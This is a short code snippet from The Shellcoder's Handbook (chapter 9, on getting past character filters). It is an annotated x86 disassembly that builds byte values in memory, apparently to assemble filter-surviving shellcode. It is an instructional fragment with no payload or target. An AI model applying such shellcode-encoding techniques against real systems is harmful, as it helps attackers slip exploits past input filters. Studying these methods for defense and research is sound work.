/*

The Shellcoder's Handbook: Discovering and Exploiting Security Holes
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
Sinan Eren, Neel Mehta, Riley Hassell
Publisher: John Wiley & Sons
ISBN: 0764544683

Chapter 9: Overcomming Filters
Code Snippet #6

Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 

*/

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 64             imul        eax,dword ptr [eax],64h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi 
0040B5C9 00 59 00             add         byte ptr [ecx],bl       // <--- BL == 0x69
0040B5CC 46                   inc         esi
0040B5CD 00 51 00             add         byte ptr [ecx],dl       // <--- DL == 0x39
0040B5D0 41                   inc         ecx
0040B5D4 41                   inc         ecx

